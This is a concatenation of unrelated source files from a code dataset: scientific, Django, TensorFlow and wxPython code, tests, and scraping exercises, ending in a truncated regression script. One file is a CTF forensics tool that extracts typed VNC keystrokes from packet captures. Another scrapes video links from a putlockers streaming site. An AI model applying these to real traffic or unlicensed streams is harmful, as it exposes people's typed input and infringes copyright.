b6a956b9818da0da10270c5fa6aa0eaccf12a1d7 | 743c1aa4ae8336645785a5afd768a3c6c7189439 | /BGWpy/BGW/__init__.py | 460615f95d9f5ce43be3666023199be3687052ec | [
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference",
"BSD-3-Clause-LBNL"
] | permissive | kcantosh/BGWpy | 566e03e888ab17b7d8ff7a68a6033d121532d905 | fc5eda118ccdd18cdcdb88141df2b673456e8bd2 | refs/heads/master | 2021-06-25T14:21:33.426910 | 2017-08-28T18:43:40 | 2017-08-28T18:43:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 415 | py | from __future__ import print_function
from . import inputs
# Core
from . import bgwtask
# Public
from .kgrid import *
from .epsilontask import *
from .sigmatask import *
from .kerneltask import *
from .absorptiontask import *
from .inteqptask import *
__all__ = (epsilontask.__all__ + sigmatask.__all__ +
kerneltask.__all__ + absorptiontask.__all__ +
kgrid.__all__ + inteqptask.__all__)
| [
"[email protected]"
] | |
3055b260778cf417707db8721cce2a574e8742a8 | a9e3f3ad54ade49c19973707d2beb49f64490efd | /Part-03-Understanding-Software-Crafting-Your-Own-Tools/models/edx-platform/lms/djangoapps/discussion/rest_api/pagination.py | 244d9b96a12060f9438120bf55da8fccfa069296 | [
"AGPL-3.0-only",
"AGPL-3.0-or-later",
"MIT"
] | permissive | luque/better-ways-of-thinking-about-software | 8c3dda94e119f0f96edbfe5ba60ca6ec3f5f625d | 5809eaca7079a15ee56b0b7fcfea425337046c97 | refs/heads/master | 2021-11-24T15:10:09.785252 | 2021-11-22T12:14:34 | 2021-11-22T12:14:34 | 163,850,454 | 3 | 1 | MIT | 2021-11-22T12:12:31 | 2019-01-02T14:21:30 | JavaScript | UTF-8 | Python | false | false | 2,689 | py | """
Discussion API pagination support
"""
from edx_rest_framework_extensions.paginators import NamespacedPageNumberPagination
from rest_framework.utils.urls import replace_query_param
class _Page:
"""
Implements just enough of the django.core.paginator.Page interface to allow
PaginationSerializer to work.
"""
def __init__(self, page_num, num_pages):
"""
Create a new page containing the given objects, with the given page
number and number of pages
"""
self.page_num = page_num
self.num_pages = num_pages
def has_next(self):
"""Returns True if there is a page after this one, otherwise False"""
return self.page_num < self.num_pages
def has_previous(self):
"""Returns True if there is a page before this one, otherwise False"""
return self.page_num > 1
def next_page_number(self):
"""Returns the number of the next page"""
return self.page_num + 1
def previous_page_number(self):
"""Returns the number of the previous page"""
return self.page_num - 1
class DiscussionAPIPagination(NamespacedPageNumberPagination):
"""
Subclasses NamespacedPageNumberPagination to provide custom implementation of pagination metadata
by overriding it's methods
"""
def __init__(self, request, page_num, num_pages, result_count=0):
"""
Overrides parent constructor to take information from discussion api
essential for the parent method
"""
self.page = _Page(page_num, num_pages)
self.base_url = request.build_absolute_uri()
self.count = result_count
super().__init__()
def get_result_count(self):
"""
Returns total number of results
"""
return self.count
def get_num_pages(self):
"""
Returns total number of pages the response is divided into
"""
return self.page.num_pages
def get_next_link(self):
"""
Returns absolute url of the next page if there's a next page available
otherwise returns None
"""
next_url = None
if self.page.has_next():
next_url = replace_query_param(self.base_url, "page", self.page.next_page_number())
return next_url
def get_previous_link(self):
"""
Returns absolute url of the previous page if there's a previous page available
otherwise returns None
"""
previous_url = None
if self.page.has_previous():
previous_url = replace_query_param(self.base_url, "page", self.page.previous_page_number())
return previous_url
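# A minimal usage sketch (view and variable names are hypothetical). The
# paginator is handed page metadata already computed by the comments service
# and wraps serialized results, assuming the DRF-style get_paginated_response
# helper inherited from the parent pagination class is used unchanged:
#
#   paginator = DiscussionAPIPagination(request, page_num, num_pages, result_count)
#   return paginator.get_paginated_response(serialized_results)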
| [
"[email protected]"
] | |
09c13e8d7e182c779642a9945ae1d18db780e082 | dec7cac75fb472ab28b57228496b17fdbcf5df1d | /accounting/views.py | 2b319b1591a9b8b214b969d1b42c9bb045ff0ca9 | [] | no_license | sofide/apicolapp | a21be58982957b1115f73a3cc80bbce58832a739 | 32f9df4109540c6fb0c07dc9de2f557ec583a9d9 | refs/heads/master | 2021-06-22T22:34:53.075938 | 2019-03-28T01:27:13 | 2019-03-28T01:27:13 | 133,557,526 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,131 | py | from datetime import datetime, timedelta, date
from django.contrib.auth.decorators import login_required
from django.db.models import Q, Sum, Count, Prefetch
from django.db.models.functions import Coalesce
from django.shortcuts import render, get_object_or_404, redirect
from accounting import forms
from accounting.manage_data import purchases_by_categories
from accounting.models import Product, Purchase, Category, Sale
def dates_form_processor(request):
"""
Use this function inside a view to process DateFromToForm data.
Return from_date, to_date and an instance of DateFromToForm.
THIS FUNCTION IS NOT A VIEW
"""
    # Default from_date and to_date params:
    # the default period starts on the most recent August 1 and ends today.
to_date = datetime.now().date()
if to_date.month >= 8:
from_year = to_date.year
else:
from_year = to_date.year - 1
from_date = date(from_year, 8, 1)
if request.GET.get('from_date'):
dates_form = forms.DateFromToForm(request.GET)
if dates_form.is_valid():
to_date = dates_form.cleaned_data['to_date']
from_date = dates_form.cleaned_data['from_date']
else:
dates_form = forms.DateFromToForm()
return from_date, to_date, dates_form
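# A sketch of how a view consumes the helper above (it mirrors the calls made
# in the views below):
#
#   from_date, to_date, dates_form = dates_form_processor(request)
#   sales = Sale.objects.filter(user=request.user, date__range=(from_date, to_date))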
@login_required
def accounting_index(request):
"""
    Show user's incomes and investments for the default period, or between
    from_date and to_date received in GET params.
"""
from_date, to_date, dates_form = dates_form_processor(request)
# INVESTMENTS
purchases = purchases_by_categories(request.user.pk, from_date, to_date)
invested_money = 0
direct_expenses_data = {}
depreciation_purchases_data = {}
for categ_purchase in purchases.values():
invested_money += categ_purchase['amount']
if categ_purchase['depreciation_period']:
data_dict = depreciation_purchases_data
else:
data_dict = direct_expenses_data
data_dict['invested_money'] = round(data_dict.get('invested_money', 0)
+ categ_purchase['amount'], 2)
data_dict['products_count'] = round(data_dict.get('products_count', 0)
+ categ_purchase['products'])
data_dict['purchases_count'] = round(data_dict.get('purchases_count', 0)
+ categ_purchase['total'])
# INCOMES
sales = Sale.objects.filter(
user=request.user,
date__range=(from_date, to_date)
).aggregate(
total=Coalesce(Count('id'), 0),
total_income=Coalesce(Sum('value'), 0),
total_kg=Coalesce(Sum('amount'), 0)
)
result = round(sales['total_income'] - invested_money, 2)
profit = result > 0
return render(request, 'accounting/accounting_index.html', {
'from_date': from_date,
'to_date': to_date,
'dates_form': dates_form,
'invested_money': invested_money,
'direct_expenses_data': direct_expenses_data,
'depreciation_purchases_data': depreciation_purchases_data,
'sales': sales,
'result': result,
'profit': profit,
'datepicker_fields_ids': ['id_from_date', 'id_to_date'],
})
@login_required
def purchase_list(request):
from_date, to_date, dates_form = dates_form_processor(request)
purchases = purchases_by_categories(request.user.pk, from_date, to_date)
return render(request, 'accounting/purchases_list.html', {
'purchases': purchases,
'from_date': from_date,
'to_date': to_date,
'dates_form': dates_form,
'datepicker_fields_ids': ['id_from_date', 'id_to_date'],
})
def product_index(request):
pass
@login_required
def product_edit(request, product_pk=None):
"""Create or edit a product."""
def _next_page(product_object):
"""Define next page if form is valid."""
next = request.GET.get('next', None)
if next == 'purchase':
return redirect('purchase_detail', product_pk=product_object.pk)
else:
return redirect('product_index')
if product_pk:
product_instance = get_object_or_404(Product, pk=product_pk, user=request.user)
else:
product_instance = None
if request.user.is_authenticated:
if request.method == 'POST':
product_form = forms.ProductForm(request.POST, instance=product_instance)
if product_form.is_valid():
new_product = product_form.save(commit=False)
new_product.user = request.user
new_product.save()
return _next_page(new_product)
else:
product_form = forms.ProductForm(instance=product_instance)
return render(request, 'accounting/product_edit.html', {
'product_form': product_form,
'instance': product_instance,
})
@login_required
def purchase_product(request):
"""First purchase step.
Select the product from historical purchases or load a new product.
"""
products = Product.objects.filter(user=request.user)
categories = Category.objects.prefetch_related(Prefetch('products', queryset=products))
if products.exists():
response = render(request, 'accounting/purchase_product.html', {
'categories': categories,
})
else:
# edit redirect response to use new product in a purchase
response = redirect('product_new')
response['Location'] += '?next=purchase'
return response
@login_required
def purchase_detail(request, product_pk, purchase_pk=None):
"""Second purchase step.
Ask user for purchase information.
"""
product = get_object_or_404(Product, pk=product_pk, user=request.user)
purchase_instance = None
if purchase_pk:
purchase_instance = get_object_or_404(Purchase, pk=purchase_pk, product=product)
if request.method == 'POST':
purchase_form = forms.PurchaseForm(request.POST, instance=purchase_instance)
if purchase_form.is_valid():
new_purchase = purchase_form.save(commit=False)
new_purchase.user = request.user
new_purchase.product = product
new_purchase.save()
return redirect('purchase_list')
else:
purchase_form = forms.PurchaseForm(instance=purchase_instance)
return render(request, 'accounting/purchase_detail.html', {
'purchase_form': purchase_form,
'product': product,
'purchase_instance': purchase_instance,
})
@login_required
def purchase_delete(request, purchase_pk):
purchase = get_object_or_404(Purchase, pk=purchase_pk)
purchase.delete()
return redirect('purchase_list')
@login_required
def sales_list(request):
"""Show user's sales list."""
from_date, to_date, dates_form = dates_form_processor(request)
sales = request.user.sales.filter(date__range=(from_date, to_date))
return render(request, 'accounting/sales_list.html', {
'sales': sales,
'from_date': from_date,
'to_date': to_date,
'dates_form': dates_form,
'datepicker_fields_ids': ['id_from_date', 'id_to_date'],
})
@login_required
def sale_new(request, sale_pk=None):
"""Save a new sale on the database."""
if sale_pk:
sale_instance = get_object_or_404(Sale, pk=sale_pk)
else:
sale_instance = None
if request.method == 'POST':
sale_form = forms.SaleForm(request.POST, instance=sale_instance)
if sale_form.is_valid():
new_sale = sale_form.save(commit=False)
new_sale.user = request.user
new_sale.save()
return redirect('sales_list')
else:
sale_form = forms.SaleForm(instance=sale_instance)
return render(request, 'accounting/sale_new.html', {
'sale_form': sale_form,
'sale_instance': sale_instance,
})
@login_required
def sale_delete(request, sale_pk):
sale = get_object_or_404(Sale, pk=sale_pk)
sale.delete()
return redirect('sales_list')
| [
"[email protected]"
] | |
c2d6f67753d23b501788801fb5ddc9bf1b830795 | 6cf46f85debb1b0505c0edcbc7296f50a44a615d | /dexy/tests/plugins/test_wordpress_filters.py | 59635a82d9934c4853b96ef03431438d88b9812a | [
"MIT"
] | permissive | aioupload/dexy | 27b7f5051417093d8336e39d71e824b3ef5c9f56 | 350b7ed23d2f3aab50097aabf3481229d75d1cf7 | refs/heads/master | 2021-01-16T22:59:11.707350 | 2013-08-05T06:08:00 | 2013-08-05T06:08:00 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,062 | py | from dexy.doc import Doc
from dexy.tests.utils import TEST_DATA_DIR
from dexy.tests.utils import wrap
from dexy.tests.utils import capture_stdout
from mock import patch
import dexy.exceptions
import json
import os
import shutil
import dexy.filter
import dexy.wrapper
def test_docmd_create_keyfile():
with wrap():
assert not os.path.exists(".dexyapis")
dexy.filter.Filter.create_instance("wp").docmd_create_keyfile()
assert os.path.exists(".dexyapis")
def test_docmd_create_keyfile_if_exists():
with wrap():
with open(".dexyapis", "w") as f:
f.write("{}")
assert os.path.exists(".dexyapis")
try:
dexy.filter.Filter.create_instance("wp").docmd_create_keyfile()
assert False, ' should raise exception'
except dexy.exceptions.UserFeedback as e:
assert ".dexyapis already exists" in e.message
def test_api_url_with_php_ending():
with wrap():
with open(".dexyapis", "wb") as f:
json.dump({
"wordpress" : {"url" : "http://example.com/api/xmlrpc.php"}
}, f)
url = dexy.filter.Filter.create_instance("wp").api_url()
assert url == "http://example.com/api/xmlrpc.php"
def test_api_url_without_php_ending():
with wrap():
with open(".dexyapis", "wb") as f:
json.dump({ "wordpress" : {"url" : "http://example.com/api"} }, f)
url = dexy.filter.Filter.create_instance("wp").api_url()
assert url == "http://example.com/api/xmlrpc.php"
def test_api_url_without_php_ending_with_trailing_slash():
with wrap():
with open(".dexyapis", "wb") as f:
json.dump({ "wordpress" : {"url" : "http://example.com/api/"} }, f)
url = dexy.filter.Filter.create_instance("wp").api_url()
assert url == "http://example.com/api/xmlrpc.php"
def test_wordpress_without_doc_config_file():
with wrap() as wrapper:
wrapper.debug = False
doc = Doc("hello.txt|wp",
contents = "hello, this is a blog post",
wrapper=wrapper
)
wrapper.run_docs(doc)
assert wrapper.state == 'error'
def mk_wp_doc(wrapper):
doc = Doc("hello.txt|wp",
contents = "hello, this is a blog post",
dirty = True,
wrapper=wrapper
)
for d in doc.datas():
d.setup()
return doc
ATTRS = {
'return_value.metaWeblog.newPost.return_value' : 42,
'return_value.metaWeblog.getPost.return_value' : {
'permaLink' : 'http://example.com/blog/42'
},
'return_value.wp.getCategories.return_value' : [
{ 'categoryName' : 'foo' },
{ 'categoryName' : 'bar' }
],
'return_value.wp.uploadFile.return_value' : {
'url' : 'http://example.com/example.pdf'
}
}
@patch('xmlrpclib.ServerProxy', **ATTRS)
def test_wordpress(MockXmlrpclib):
with wrap():
with open("wordpress.json", "wb") as f:
json.dump({}, f)
with open(".dexyapis", "wb") as f:
json.dump({
'wordpress' : {
'url' : 'http://example.com',
'username' : 'foo',
'password' : 'bar'
}}, f)
# Create new (unpublished) draft
wrapper = dexy.wrapper.Wrapper()
doc = mk_wp_doc(wrapper)
wrapper.run_docs(doc)
with open("wordpress.json", "rb") as f:
result = json.load(f)
assert result['postid'] == 42
assert result['publish'] == False
# Update existing draft
wrapper = dexy.wrapper.Wrapper()
doc = mk_wp_doc(wrapper)
wrapper.run_docs(doc)
assert doc.output_data().json_as_dict().keys() == ['permaLink']
result['publish'] = True
with open("wordpress.json", "wb") as f:
json.dump(result, f)
# Publish existing draft
wrapper = dexy.wrapper.Wrapper()
doc = mk_wp_doc(wrapper)
wrapper.run_docs(doc)
assert "http://example.com/blog/42" in str(doc.output_data())
# Now, separately, test an image upload.
orig = os.path.join(TEST_DATA_DIR, 'color-graph.pdf')
shutil.copyfile(orig, 'example.pdf')
from dexy.wrapper import Wrapper
wrapper = Wrapper()
doc = Doc("example.pdf|wp",
wrapper=wrapper)
with open(".dexyapis", "wb") as f:
json.dump({
'wordpress' : {
'url' : 'http://example.com',
'username' : 'foo',
'password' : 'bar'
}}, f)
wrapper.run_docs(doc)
assert doc.output_data().as_text() == "http://example.com/example.pdf"
# test list categories
with capture_stdout() as stdout:
dexy.filter.Filter.create_instance("wp").docmd_list_categories()
assert stdout.getvalue() == "categoryName\nfoo\nbar\n"
| [
"[email protected]"
] | |
179136706a176c379e4e834a4aa983bf7e7f6ac6 | 421f42acd37d3d02dda23bad4bc68cc58b481c00 | /forensics/ekoparty-vnc/getvnckeys.py | 0656a55d4ed0be982b14ead90bf9394e324d41a2 | [] | no_license | sourcekris/ctf-solutions | 6963d0a1524c4d5bd738d187e72f571bf608bd7a | 3251f113c3a94732e432885fc785fb71d67d05e8 | refs/heads/master | 2021-08-27T18:13:00.902502 | 2021-08-25T07:59:46 | 2021-08-25T07:59:46 | 38,923,614 | 5 | 6 | null | null | null | null | UTF-8 | Python | false | false | 1,048 | py | #!/usr/bin/python
#
# Extract the VNC keystrokes from a PCAP using tshark
#
# kris, Capture The Swag
#
# http://github.com/sourcekris/
#
import subprocess
import sys
import os
import re
if len(sys.argv) < 2:
print "Usage: " + sys.argv[0] + " <pcap or pcapng>"
sys.exit(-1)
# read the tshark data in PDML format - hope it's not huge
DEVNULL = open(os.devnull,'w')
print "[+] Reading pcap file: " + sys.argv[1]
pdmllines = subprocess.check_output(['tshark','-r',sys.argv[1],'-Tpdml'],stderr=DEVNULL).splitlines()
message = []
keydown = False
for line in pdmllines:
if 'name="vnc.key_down"' in line and 'showname="Key down: Yes"' in line:
keydown = True
elif 'name="vnc.key_down"' in line and 'showname="Key down: No"' in line:
keydown = False
elif keydown and 'name="vnc.key"' in line and 'showname="Key: ' in line:
keyval = re.sub(r'[^a-f0-9]','',line.split('value=')[1])[-2:]
try:
chr(int(keyval,16)).decode('ascii')
except:
pass
else:
message.append(chr(int(keyval,16)))
print "[+] Message: " + "".join(message)
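# Example invocation (the capture file name is hypothetical):
#   ./getvnckeys.py challenge.pcapng
# This recovers the text because RFB KeyEvent keysyms for printable Latin-1
# characters equal their character codes, so keeping the low byte of vnc.key
# and filtering on ASCII-decodability yields the typed message.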
| [
"[email protected]"
] | |
4357960f8e003e9c912bd7ac3fd0ed1852c7932b | 169e75df163bb311198562d286d37aad14677101 | /tensorflow/tensorflow/contrib/autograph/utils/builtins_test.py | 0c2312178a921037fa419818bf309d671c33914d | [
"Apache-2.0"
] | permissive | zylo117/tensorflow-gpu-macosx | e553d17b769c67dfda0440df8ac1314405e4a10a | 181bc2b37aa8a3eeb11a942d8f330b04abc804b3 | refs/heads/master | 2022-10-19T21:35:18.148271 | 2020-10-15T02:33:20 | 2020-10-15T02:33:20 | 134,240,831 | 116 | 26 | Apache-2.0 | 2022-10-04T23:36:22 | 2018-05-21T08:29:12 | C++ | UTF-8 | Python | false | false | 4,569 | py | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for builtins module."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import sys
import six
from tensorflow.contrib.autograph.utils import builtins
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.platform import test
class BuiltinsTest(test.TestCase):
def test_dynamic_len_tf_scalar(self):
a = constant_op.constant(1)
with self.assertRaises(ValueError):
with self.test_session() as sess:
sess.run(builtins.dynamic_builtin(len, a))
def test_dynamic_len_tf_array(self):
a = constant_op.constant([1, 2, 3])
with self.test_session() as sess:
self.assertEqual(3, sess.run(builtins.dynamic_builtin(len, a)))
def test_dynamic_len_tf_matrix(self):
a = constant_op.constant([[1, 2], [3, 4]])
with self.test_session() as sess:
self.assertEqual(2, sess.run(builtins.dynamic_builtin(len, a)))
def test_dynamic_len_py_list(self):
a = [3] * 5
self.assertEqual(5, builtins.dynamic_builtin(len, a))
def test_dynamic_range_all_python(self):
self.assertListEqual(list(builtins.dynamic_builtin(range, 3)), [0, 1, 2])
self.assertListEqual(list(builtins.dynamic_builtin(range, 1, 3)), [1, 2])
self.assertListEqual(
list(builtins.dynamic_builtin(range, 2, 0, -1)), [2, 1])
def test_dynamic_range_tf(self):
with self.test_session() as sess:
self.assertAllEqual(
sess.run(builtins.dynamic_builtin(range, constant_op.constant(3))),
[0, 1, 2])
self.assertAllEqual(
sess.run(builtins.dynamic_builtin(range, 1, constant_op.constant(3))),
[1, 2])
self.assertAllEqual(
sess.run(
builtins.dynamic_builtin(range, 2, 0, constant_op.constant(-1))),
[2, 1])
def test_dynamic_range_detection(self):
def range(x): # pylint:disable=redefined-builtin
return x
# Functions that just have the names of builtins are rejected.
with self.assertRaises(NotImplementedError):
self.assertEqual(builtins.dynamic_builtin(range, 1), 1)
if six.PY2:
self.assertListEqual(
list(builtins.dynamic_builtin(xrange, 3)), [0, 1, 2])
self.assertListEqual(
list(builtins.dynamic_builtin(six.moves.range, 3)), [0, 1, 2])
self.assertListEqual(
list(builtins.dynamic_builtin(six.moves.xrange, 3)), [0, 1, 2])
def test_casts(self):
i = constant_op.constant(2, dtype=dtypes.int32)
f = constant_op.constant(1.0, dtype=dtypes.float32)
self.assertEqual(builtins.dynamic_builtin(int, i).dtype, dtypes.int32)
self.assertEqual(builtins.dynamic_builtin(int, f).dtype, dtypes.int32)
self.assertEqual(builtins.dynamic_builtin(float, i).dtype, dtypes.float32)
self.assertEqual(builtins.dynamic_builtin(float, f).dtype, dtypes.float32)
self.assertEqual(builtins.dynamic_builtin(int, True), 1)
self.assertEqual(builtins.dynamic_builtin(int, False), 0)
self.assertEqual(builtins.dynamic_builtin(float, True), 1.0)
self.assertEqual(builtins.dynamic_builtin(float, False), 0.0)
def test_dynamic_print_tf(self):
try:
out_capturer = six.StringIO()
sys.stdout = out_capturer
with self.test_session() as sess:
sess.run(builtins.dynamic_print('test message', 1))
self.assertEqual(out_capturer.getvalue(), 'test message 1\n')
finally:
sys.stdout = sys.__stdout__
def test_dynamic_print_complex(self):
try:
out_capturer = six.StringIO()
sys.stdout = out_capturer
with self.test_session() as sess:
sess.run(builtins.dynamic_print('test message', [1, 2]))
self.assertEqual(out_capturer.getvalue(), 'test message [1, 2]\n')
finally:
sys.stdout = sys.__stdout__
if __name__ == '__main__':
test.main()
| [
"[email protected]"
] | |
c8e05da4b1e368920092b454e82ee0183422509a | 0c6b47f5647fa048e701c743bd61e05667b3b569 | /101_Common_Dialogs/SingleChoiceDialog/__demo__.py | 3556b9bda73bf996e3b30c39c0042e5e6c1cfb11 | [] | no_license | pythonthings/wxPython-Sample-Apps-and-Demos | bbfa5c307c08bd0e732083a7e7ec0aaefa234033 | 65e6828e92217445367420c9c2ebb4a7ed9a1d6e | refs/heads/master | 2022-10-02T18:41:01.697132 | 2020-06-10T00:18:15 | 2020-06-10T00:18:15 | 281,526,555 | 1 | 0 | null | 2020-07-21T23:32:51 | 2020-07-21T23:32:51 | null | UTF-8 | Python | false | false | 2,243 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#-MetaData --------------------------------------------------------------------
__doc__ = """
This module contains the meta data needed for integrating the samples
in the directory into the wxPython demo framework. Once imported,
this module returns the following information:
* GetDemoBitmap: returns the bitmap used in the wxPython tree control
to characterize the package;
* GetDemos: returns all the demos in the package;
* GetOverview: returns a wx.html-ready representation of the package's docs.
These meta data are merged into the wxPython demo tree at startup.
Last updated: User's Name @ 08 Aug 20xx, 21.00 GMT.
Version 0.0.1
"""
__version__ = "0.0.1"
__author__ = "wxPython Team"
#-Imports----------------------------------------------------------------------
#--wxPython Imports.
import wx
from wx.lib.embeddedimage import PyEmbeddedImage
def GetDemoBitmap():
"""
Returns the bitmap to be used for the demo tree item's bitmap.
"""
# Get the image as PyEmbeddedImage
image = dialog16 = PyEmbeddedImage(
"iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAABHNCSVQICAgIfAhkiAAAAKRJ"
"REFUeJytk0EOwjAMBGdRH+DvVOJVqLfCBZVbxadaJc8yB5RCSguEMhdLK3uzshWZGVuomkPj"
"vw73114VQHtqkS5fD7q3SMLM2AFFw/P+KjmWIh0B7gkScYxFFYDu3Lm7exhCUQXczB4GpSYv"
"Bn9J8AwwNS/pyWBa4tKC6n29qmdnTKKk7FRxjKt6Ikvg7oQhTDUlWNKzBPMXStDW37j73PKe"
"G2AyEYLJPQvVAAAAAElFTkSuQmCC")
# Return the bitmap to use in the wxPython demo tree control.
return image
def GetDemos():
"""
Returns all the demo names in the package, together with the
tree item name which will go in the wxPython demo tree control.
"""
# The tree item text.
TreeItemText = "SingleChoiceDialog"
# The tree item's demos.
TreeItemDemos = (
'SingleChoiceDialog_extended.py',
'SingleChoiceDialog_minimal.py',
)
return TreeItemText, TreeItemDemos
def GetOverview():
"""
Creates the wxHTML code to display on the tree item's Overview tab.
"""
wxHtmlOverviewStr = '''\
<html><body>
<center><h2>SingleChoiceDialog</h2></center>
<p>SingleChoiceDialog demos.
</body></html>
'''
return wxHtmlOverviewStr
| [
"[email protected]"
] | |
604e26e48551410e05524b6f2d4cec5c440f5fbf | ff1137a7d8f9c01632cf757495e065ec5e3817a2 | /爬虫精进/第9关/第9关 selenium提取网页源代码后用bs解析.py | 900588bc680a8a8384ae9a8b2ae68d504b017129 | [] | no_license | yuqiuming2000/Python-code | 3d5e5d8ba5c5f477b4cfab67b0d63d838eefc591 | b16a6c425d4bf400df6b365d091f56bc8c5c4d34 | refs/heads/master | 2023-06-22T04:22:25.991172 | 2021-07-24T13:49:38 | 2021-07-24T13:49:38 | 389,100,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 571 | py | from selenium import webdriver #从selenium库中调用webdriver模块
import time
from bs4 import BeautifulSoup
driver = webdriver.Chrome() # use Chrome as the engine; this actually opens a Chrome browser
driver.get('https://localprod.pandateacher.com/python-manuscript/hello-spiderman/') # visit the page
time.sleep(2) # wait 2 seconds
page_source=driver.page_source
print(page_source)
bs=BeautifulSoup(page_source,'html.parser')
labels=bs.find_all('label')
# print(type(labels)) # print the data type of labels
for i in labels:
print(i.text)
driver.close() # close the browser | [
"[email protected]"
] | |
317167f3c7c18125e0cf23dbcaad084d793b878d | 01fa2aca31eb73a559d192fd29e44350f26a13a9 | /HAX/18.CocoJoe/script.module.lambdascrapers/lib/lambdascrapers/sources_quick/unchecked/putlockersio.py | 66419b703d52903a2d204fa04395dc04459b9fd2 | [
"Beerware"
] | permissive | RandomIntermition/k4y108837s | b4beedeff375645bd4fa9ad348631a9a9f3640b6 | e9115aad49795dfe30a96c278cedaf089abcc11d | refs/heads/master | 2022-05-01T18:45:57.298903 | 2022-03-30T03:41:08 | 2022-03-30T03:41:08 | 109,356,425 | 1 | 0 | null | 2019-11-08T02:20:47 | 2017-11-03T05:36:48 | Python | UTF-8 | Python | false | false | 1,662 | py | # -*- coding: UTF-8 -*-
# -Cleaned and Checked on 10-16-2019 by JewBMX in Scrubs.
import re
from resources.lib.modules import client
from resources.lib.modules import cleantitle
from resources.lib.modules import more_sources
class source:
def __init__(self):
self.priority = 1
self.language = ['en']
self.domains = ['putlockers.io']
self.base_link = 'https://putlockers.io'
def movie(self, imdb, title, localtitle, aliases, year):
try:
mTitle = cleantitle.geturl(title)
url = self.base_link + '/movies/' + mTitle
return url
except:
return
def tvshow(self, imdb, tvdb, tvshowtitle, localtvshowtitle, aliases, year):
try:
url = cleantitle.geturl(tvshowtitle)
return url
except:
return
def episode(self, url, imdb, tvdb, title, premiered, season, episode):
try:
if not url:
return
url = self.base_link + '/episodes/' + url + '-' + season + 'x' + episode
return url
except:
return
def sources(self, url, hostDict, hostprDict):
try:
sources = []
if url == None:
return sources
page = client.request(url)
links = re.compile('<iframe.+?src="(.+?)"', re.DOTALL).findall(page)
for link in links:
for source in more_sources.getMore(link, hostDict):
sources.append(source)
return sources
except:
return sources
def resolve(self, url):
return url
| [
"[email protected]"
] | |
7cc3e50af6a48ca74abfc02656c9019972018641 | 499fc7e223551d434582417353203ecd53b7d731 | /DataTypeandManipulation/TypeCasting.py | efab449b81a11562cf61c91d04d3c343f363a5ba | [] | no_license | pravinherester/LearnPython | df53045e4b098a9923e7ecbbeffedb75f6c82f81 | 05c06dccd9ac45fc30cf0675f89f0bb2c7db6644 | refs/heads/master | 2023-08-11T10:12:50.494666 | 2021-06-19T04:44:12 | 2021-09-10T01:20:58 | 338,636,734 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 342 | py | num_char=len(input("What is your name"))
print(type(num_char))
new_num_char=str(num_char)
print("After type casting")
print(type(new_num_char))
print("Your name has "+new_num_char+ " characters") # this does not break because new_num_char is now a string
# Other examples: guess what each of these prints
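# For reference, they print 200.75 and 100100: int + float is promoted to a
# float, while str + str concatenates the strings.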
print(100+float(100.75))
print(str(100)+str(100)) | [
"[email protected]"
] | |
edd2eb581d44ecbc4d3ec57ebcfa7c00cca0f24f | 9dab93d895d0f496452d91b9e0eba365a7c547f2 | /hw7/problem1.py | a4e32c1622ee8bb0a5d8cbfafabb6e02061a2493 | [] | no_license | codeAligned/CS156 | 8d758175f29015338b4f179f24962847b54e6bce | 25012963985ab325bbd4bdc8a9eba914259a5249 | refs/heads/master | 2020-05-17T20:54:51.935297 | 2014-11-12T05:01:36 | 2014-11-12T05:01:36 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,438 | py | import random
import math
import numpy as np
from numpy.linalg import *
from numpy.matlib import *
import matplotlib.pyplot as plt
def dotProduct(list1, list2):
assert(len(list1) == len(list2))
result = 0
for i in range(len(list1)):
result += (list1[i] * list2[i])
return result
def generatePoint():
x = random.uniform(-1,1)
y = random.uniform(-1,1)
return (x,y)
def sign(value):
if (value >= 0.0):
return 1.0
else:
return -1.0
# returns False if any point is misclassified, True otherwise
def checkMisclassified(points, weights, results):
for i in range(len(points)):
result = sign(dotProduct(weights, list(points[i])))
if (result != results[i]):
return False
return True
# don't use regularization!
def linearRegression(points, results):
X = array(points)
#print X
XTrans = X.transpose()
#print XTrans
xTransTimesX = np.dot(XTrans, X)
#print xTransTimesX
#print xTransTimesX.shape[0]
#k = 1 / float(len(points))
k = .01
#print k
#print k * np.identity(xTransTimesX.shape[0])
Z = xTransTimesX# + k * np.identity(xTransTimesX.shape[0])
inverse = inv(Z)
#print inverse
Y = array(results)
#print Y
w = np.dot(np.dot(inverse, XTrans), Y)
#print w
return w
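# The closed form computed above is the ordinary least-squares normal equation,
# w = (X^T X)^{-1} X^T y; re-enabling the commented-out k * identity term would
# give the regularized (ridge) form w = (X^T X + k I)^{-1} X^T y.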
def calcEin(points, results, weights):
assert len(points) == len(results)
#print points
counter = 0
for i in range(len(points)):
point = points[i]
result = results[i]
sumWeights = 0.0
for j in range(len(weights)):
#print point
#print weights
sumWeights += (weights[j] * point[j])
#print sumWeights
if sign(sumWeights) != result:
#print "MISS"
counter += 1
#print "Count: ", counter
#print "POINTS: ", len(points)
return counter / float(len(points))
def regression(N):
(x1,y1) = generatePoint()
(x2,y2) = generatePoint()
rise = y2 - y1
run = x2 - x1
slope = rise / run
# y = mx + b
#b = y - mx
b = y1 - slope * x1
# Now, we have y = (slope) * x + b
#print "y = ", slope, "x + ", b
#xvalues = range(N)
#yvalues = range(N)
points = range(N)
for i in range(N):
(x,y) = generatePoint()
points[i] = ((1, x,y))
#xvalues[i] = x
#yvalues[i] = y
results = range(N)
for j in range(N):
point = points[j]
x = point[1]
y = point[2]
yVal = slope * x + b
if (y > yVal):
results[j] = 1
else:
results[j] = -1
xPos = range(N)
